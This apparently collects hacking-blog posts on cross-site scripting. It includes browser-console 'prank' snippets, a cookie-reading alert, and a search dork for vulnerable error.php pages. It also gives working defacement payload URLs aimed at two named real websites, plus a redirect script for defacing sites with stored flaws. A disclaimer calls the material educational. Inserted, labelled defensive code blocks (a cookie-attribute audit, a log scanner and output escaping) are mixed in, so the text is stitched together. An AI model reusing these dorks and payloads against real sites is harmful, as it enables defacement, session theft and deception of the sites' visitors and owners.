
Monday, 20 June 2016

How to get XSS Pop Up on any Site | Javascript Injection

Hello guys! Today we are going to discuss JavaScript injection :P. With it you can get an XSS pop-up on any site; all you need to do is paste some JavaScript vectors into the console prompt of your browser.

With this you can prank your friends just by pasting JavaScript into the console on a popular site like Facebook, taking screenshots and simply sending them to your friend :P OK, so here we start..

Javascript Injection: Produce XSS Pop Up on any Site. Basically, it's just for fun, but sometimes you can get the cookies of a vulnerable website by using JavaScript injection. OK, so let's start..

1). In Chrome, open the console with Ctrl+Shift+I, paste any of these JavaScript snippets into the console box and get a pop-up :)

2). Do the same for Firefox :) Ctrl+Shift+I :)

To Alert and Change the Title on a Website with JavaScript (XSS)

Just enter the JavaScript below in the console :)
Javascript: alert(document.title = "title name");

Message On website on alert Box

Just enter this script:
Javascript: alert("you message here");
Use this script for more than one message:
javascript: alert("First message"); alert("second message"); alert("Third message");



Getting Cookies with JavaScript (XSS)

You can also get cookies with JavaScript (XSS). Just use the scripts below :)
alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie); 
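An added example, not part of the original post: `document.cookie` only returns cookies that were set without the HttpOnly attribute, so a site owner can audit the Set-Cookie response headers to see which cookies script running in the page could read. The header values and function names below are constructed for illustration.

```javascript
// Constructed sample Set-Cookie header values (not captured from any real site).
const SAMPLE_SET_COOKIE = [
  "username=user123; Path=/",
  "session=constructed-sample-value; Path=/; HttpOnly; Secure; SameSite=Lax",
  "prefs=dark; Path=/; Secure",
];

// Parse one Set-Cookie value into the cookie name and a lower-cased attribute map.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const attributes = Object.create(null);
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, attributes };
}

// Names of the cookies that alert(document.cookie) would display in the page.
function scriptReadable(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.attributes.httponly)
    .map((c) => c.name);
}

// Report every cookie that is missing one of the protective attributes.
function auditCookies(headers) {
  const findings = [];
  for (const header of headers) {
    const { name, attributes } = parseSetCookie(header);
    const issues = [];
    if (!attributes.httponly) issues.push("readable via document.cookie (no HttpOnly)");
    if (!attributes.secure) issues.push("sent over plain HTTP (no Secure)");
    if (!attributes.samesite) issues.push("no SameSite attribute");
    if (issues.length) findings.push({ name, issues });
  }
  return findings;
}

console.log(auditCookies(SAMPLE_SET_COOKIE));
```

The session cookie in the sample produces no finding because it carries HttpOnly, Secure and SameSite; the other two are flagged.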
What are you waiting for? Just go ahead and prank your friends :P
So that's it for now. If you really enjoyed reading, do share and don't forget to leave your feedback :)...

Saturday, 31 October 2015

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (devilscafe.in)
browser : Mozilla Firefox 






1). Go to Google and type the dork "inurl:error.php?error=".
In the search results, ignore all the extra results with a different URL, like: error-php-error.php
Pick a site with the URL www.site.com/error.php?error= only.

2). Now type your first tag to check for the vulnerability.
Example: www.site.com/error.php?error=<h1>Test</h1>
If it shows you the word "Test" in a header tag, then it's vulnerable.

Here are a few ways in which you can inject your XSS vector :) ..

How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

To show header in center XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show Title XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to Add a Image XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a Message XSS injection
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How To add background colour in page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to Add a full deface Page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.thehackerstore.net</b></marquee>

You can add more HTML and JavaScript tags here.
Here is another demo site:
www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
Find more websites with dorks :)

If you have any queries, feel free to comment below :)
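An added example, not part of the original post: from the site owner's side, requests like the ones above stand out in the web server access log, because a query parameter carries HTML tags. The log lines, regular expressions and function names below are constructed for illustration.

```javascript
// Constructed access-log lines in combined-log style (sample data only).
const SAMPLE_LOG = [
  '203.0.113.5 - - [31/Oct/2015:10:00:01 +0000] "GET /error.php?error=404 HTTP/1.1" 200 512',
  '203.0.113.9 - - [31/Oct/2015:10:00:07 +0000] "GET /error.php?error=%3Ch1%3ETest%3C%2Fh1%3E HTTP/1.1" 200 530',
  '203.0.113.9 - - [31/Oct/2015:10:00:09 +0000] "GET /error.php?error=%3Cmarquee%3EScrolling+text%3C%2Fmarquee%3E HTTP/1.1" 200 541',
  '198.51.100.2 - - [31/Oct/2015:10:01:00 +0000] "GET /index.php?q=a+%3C+b HTTP/1.1" 200 900',
  '198.51.100.2 - - [31/Oct/2015:10:01:04 +0000] "GET /error.php?error=50%zz HTTP/1.1" 200 498',
];

const REQUEST_RE = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/;
// An opening or closing tag: "<" or "</" followed directly by a letter, up to ">".
const TAG_RE = /<\/?[a-z][^>]*>/i;

// Return one hit per query parameter whose decoded value contains an HTML tag.
function findMarkupInQuery(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return [];
  let url;
  try {
    // The base is a placeholder; only the path and query from the log are used.
    url = new URL(m[1], "http://log.invalid");
  } catch {
    return []; // unparseable request target: nothing to inspect
  }
  const hits = [];
  // searchParams decodes %XX and "+" and leaves malformed escapes as they are.
  for (const [param, value] of url.searchParams) {
    const tag = TAG_RE.exec(value);
    if (tag) hits.push({ path: url.pathname, param, tag: tag[0] });
  }
  return hits;
}

// Scan a whole log and attach 1-based line numbers to the hits.
function scanLog(lines) {
  return lines.flatMap((line, i) =>
    findMarkupInQuery(line).map((hit) => ({ line: i + 1, ...hit })));
}

console.log(scanLog(SAMPLE_LOG));
```

A bare comparison such as `a < b` (line 4) and a malformed escape (line 5) do not match, which keeps ordinary searches out of the results.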



Wednesday, 08 August 2012

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial


This is my third article in the Cross Site Scripting tutorial. Last time, I explained how to do a vulnerability test for XSS and some filter bypassing techniques. Now let us see how a hacker defaces a website with an XSS vulnerability.

Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common things a hacker does on finding a vulnerability in a website. Defacing is changing the content of the website to the hacker's content. Most of the time, attackers use this technique to inform the admin about the vulnerability. But it's a bad idea..!

Script for changing the background color of a website:
<script>document.body.bgColor="red";</script>


Script for changing the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>


Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find an XSS vulnerable site, insert the script as:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability


What is XSS?
Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users. In a typical XSS attack, a hacker injects malicious JavaScript code into a legitimate website. When a user visits the infected page or a specially crafted link, the malicious JavaScript executes. A successfully exploited XSS vulnerability allows attackers to carry out phishing attacks, steal accounts and even spread worms.

Example: Let us imagine a hacker has discovered an XSS vulnerability in Gmail and injected a malicious script. When a user visits the site, it will execute the malicious script. The malicious code can be used to redirect users to a fake Gmail page or capture cookies. Using these stolen cookies, he can log in to your account and change the password.
It will be helpful for understanding XSS if you have the following prerequisites:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of HTTP client-server architecture (Reference)
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use Google dorks to find vulnerable sites, for instance "?search=" or ".php?q=". 1337 target specific sites instead of using Google search. If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find an input field so that we can inject our own script, for example: a search box, username, password or any other input field.


Test 1 :
Once we have found the input field, let us try to put some string inside the field; for instance, let me input "HS". It will display the result.

Now right-click on the page and select View Source. Search for the string "HS" which we entered in the input field. Note the location where the input is placed.


Test 2:
Now we are going to check whether the server sanitizes our input or not. In order to do this, let us input the <script> tag in the input field.
View the source of the page. Find the location where the input was displayed in the previous test.

Thank god, our code is not being sanitized by the server and the code is just the same as what we entered in the field. If the server sanitized our input, the code would look like this: &lt;script&gt;. This indicates that the website is vulnerable to XSS attack and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack. But let us make sure whether the site is completely vulnerable to this attack by injecting full JavaScript code. For instance, let us input <script>alert('HS')</script> .

Now it will display a pop-up box with the 'HS' string. Finally, we have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.
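An added example, not part of the original tutorial: the difference Test 2 looks for, shown from the server side. It applies equally to the error.php?error= pattern from the earlier post. The first renderer echoes the parameter unchanged; the second encodes it at output time, so the source shows &lt;script&gt;; the error page accepts only known codes. All function names, messages and error codes are hypothetical.

```javascript
// Encode the characters that are significant in HTML text and quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the request parameter is concatenated into the page unchanged.
function renderVulnerable(input) {
  return `<p>search results for ${input}</p>`;
}

// Hardened: the same page with the parameter encoded wherever it is written,
// both in the text and inside the quoted attribute of the search box.
function renderEscaped(input) {
  return `<p>search results for ${escapeHtml(input)}</p>` +
    `<input name="q" value="${escapeHtml(input)}">`;
}

// For an error page: accept only known codes and never echo free text.
const ERROR_MESSAGES = { "403": "Access denied", "404": "Page not found" };
function renderErrorPage(code) {
  const known = Object.prototype.hasOwnProperty.call(ERROR_MESSAGES, code);
  return `<h1>${escapeHtml(known ? ERROR_MESSAGES[code] : "Unknown error")}</h1>`;
}

// The view-source check from Test 2, automated: does the probe come back unencoded?
function reflectsRawMarkup(render, probe = "<script>HS</script>") {
  return render(probe).includes(probe);
}

console.log("vulnerable reflects markup:", reflectsRawMarkup(renderVulnerable));
console.log("escaped reflects markup:   ", reflectsRawMarkup(renderEscaped));
console.log(renderEscaped("<script>alert('HS')</script>"));
```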

Types of XSS Based on persisting capability:
Based on persistence capability, we can categorize XSS attacks into two types, namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database, and then permanently run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their questions by posting messages, which are stored in the database. Let us imagine an attacker posts a message containing malicious JavaScript code instead. If the server fails to sanitize the input provided, it results in execution of the injected script. The code will be executed whenever a user tries to read the post. If the injected code is cookie-stealing code, then it will steal the cookies of users who read the post. Using the cookie, the attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred to as Reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server via an HTTP request. The server embeds the input in the HTML file and returns the file (HTTP response) to the browser. When the browser executes the HTML file, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Let us consider a project hosting website. To find our favorite project, we just input a related word in the search box. When the search is finished, it will display a message like this: "search results for yourword". If the server fails to sanitize the input properly, it will result in execution of the injected script.

In the case of reflected XSS attacks, the attacker sends the specially crafted link to victims and tricks them into clicking the link. When a user clicks the link, the browser sends the injected code to the server, and the server reflects the attack back to the user's browser. The browser then executes the code.

In addition to these types, there is also a third type of attack called DOM Based XSS; I will explain this attack in later posts.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)

Disclaimer:
This article is intended for educational purpose only.
